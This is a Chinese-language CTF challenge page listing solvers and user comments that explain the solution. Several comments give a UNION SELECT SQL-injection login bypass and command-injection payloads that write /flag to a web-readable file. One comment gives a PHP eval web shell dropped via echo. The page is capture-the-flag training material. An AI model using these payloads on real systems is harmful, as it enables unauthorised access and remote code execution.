评分(9)
解题动态
hiro666 攻破了该题 7小时前
evilk 攻破了该题 12小时前
0xchang 攻破了该题 1天前
AzKanna 攻破了该题 1天前
IamnotLin 攻破了该题 3天前
指尖上的幼稚鬼 攻破了该题 3天前
liqs 攻破了该题 4天前
川渝流水 攻破了该题 5天前
jsbba 攻破了该题 5天前
GODt 攻破了该题 5天前
原神牛逼 攻破了该题 5天前
sdgkk1234 攻破了该题 5天前
敛侠 攻破了该题 6天前
乱来小木 攻破了该题 9天前
lanza2451150 攻破了该题 9天前
SkyAsh 攻破了该题 9天前
wes 攻破了该题 10天前
kkkkkkkkkkk 攻破了该题 11天前
陌兮li 攻破了该题 13天前
评论
5883120xly 2月前
举报
username= ' UNION SELECT '任意用户名', 'fae0b27c451c728867a567e8c1bb4e53' -- password=666 进入命令执行界面输入 666 | cat /flag >2.txt 访问http://117.72.52.127:14324/2.txt即可
你文博哥哥 4月前
举报
首先爆破,没出来,sqlmap扫了,账号密码为空,丫的,没法去找有用信息,源码,请求头,都没,最后在返回包找到了tip,解码,得到注入点,username输入admin'union select 1,md5(123)#&password(123),得到监控系统,然后看见输入框,想到了rce,然后尝试输入1,然后输入ls /,没回显,被过滤,后面利用tee命令,将查找写入新文件,访问即可
一个姓⎝李⎠的师傅~ 4月前
举报
做了 3 个小时,完整记录了自己的 25 个步骤,sqlmap 省略了因为没有可用信息! 来看看吧,肯定会对你有帮助,联合注入的发现,命令执行写入文件绕过没有网页回显命令内容的办法,包括路径的讲解: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#zIr77
꧁༺༽༾ཊCCཏ༿༼༻꧂ 5月前
举报
没难度
六分之杰 5月前
举报
https://zhuanlan.zhihu.com/p/7343164566
D调丶Slayer 5月前
举报
https://blog.csdn.net/weixin_58111246/article/details/123482301?spm=1001.2014.3001.5501
19957910119 5月前
举报
1&&echo '<?php @eval($_POST['shell']);phpinfo();?>'>test.php
ctfer-pls 6月前
举报
看了评论厉害了
ilovevicky99 6月前
举报
用反弹shell的方法,为什么没有回显呀
zhuizhui 7月前
举报
' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test